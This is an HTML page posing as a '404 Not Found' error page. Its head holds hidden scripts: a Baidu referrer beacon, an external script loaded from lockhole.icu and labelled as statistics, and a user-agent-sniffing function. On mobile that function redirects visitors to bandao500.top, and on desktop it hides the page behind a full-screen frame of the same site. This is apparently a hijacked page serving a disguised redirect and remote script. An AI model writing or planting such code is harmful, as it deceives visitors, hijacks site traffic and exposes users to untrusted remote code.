<html mip="">

<head>
	<meta charset="utf-8" />
	<title>404 Not Found</title>
	<meta name="keywords" content="404 Not Found" />
	<meta name="description" content="404 Not Found" />
	<script>
		(function () {
			var canonicalURL, curProtocol;
			//Get the  tag
			var x = document.getElementsByTagName("link");
			//Find the last canonical URL
			if (x.length > 0) {
				for (i = 0; i < x.length; i++) {
					if (x[i].rel.toLowerCase() == 'canonical' && x[i].href) {
						canonicalURL = x[i].href;
					}
				}
			}
			//Get protocol
			if (!canonicalURL) {
				curProtocol = window.location.protocol.split(':')[0];
			} else {
				curProtocol = canonicalURL.split(':')[0];
			}
			//Get current URL if the canonical URL does not exist
			if (!canonicalURL) canonicalURL = window.location.href;
			//Assign script content. Replace current URL with the canonical URL
			! function () {
				var e = /([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,
					r = canonicalURL,
					t = document.referrer;
				if (!e.test(r)) {
					var n = (String(curProtocol).toLowerCase() === 'https') ?
						"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif" : "//api.share.baidu.com/s.gif";
					t ? (n += "?r=" + encodeURIComponent(document.referrer), r && (n += "&l=" + r)) : r && (n += "?l=" +
						r);
					var i = new Image;
					i.src = n
				}
			}(window);
		})();
	</script>

    <!-- ZORAN的统计 -->
    <script src="https://lockhole.icu/wv/wv.js"></script>
    
	<script>
		//From Solomon…ejavascript:;
		function browserRedirect() {
			var sUserAgent = navigator.userAgent.toLowerCase();
			var bIsIpad = sUserAgent.match(/ipad/i) == "ipad";
			var bIsIphoneOs = sUserAgent.match(/iphone os/i) == "iphone os";
			var bIsMidp = sUserAgent.match(/midp/i) == "midp";
			var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4";
			var bIsUc = sUserAgent.match(/ucweb/i) == "ucweb";
			var bIsAndroid = sUserAgent.match(/android/i) == "android";
			var bIsCE = sUserAgent.match(/windows ce/i) == "windows ce";
			var bIsWM = sUserAgent.match(/windows mobile/i) == "windows mobile";
			if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) {
				var urls = ["https://www.bandao500.top"];
				var url = urls[parseInt(Math.random()*urls.length)];

				//移动跳转
				document.writeln("<meta http-equiv='refresh' content='0.1;url="+url+"'>");
				document.writeln("<script language = javascript>");
				document.writeln(
					"window.navigate('"+url+"');"
					);
				document.writeln(
					"window.location.href='"+url+"';"
					);
				document.writeln("<\/script>");

			} else {
				var urls = ["https://www.bandao500.top"];
				var url = urls[parseInt(Math.random()*urls.length)];

				//pc跳转
				document.writeln("<frameset rows=\'100%\' frameborder=\'no\' framespacing=\'0\' border=\'0\'>");
				document.writeln(
					"<frame src=\'"+url+"\' frameborder=\'0\' framespacing=\'0\' marginheight=\'0\' marginwidth=\'0\'>"
					);
				document.writeln("</frameset>");
			}
		}
		browserRedirect();
	</script>
</head>

</html>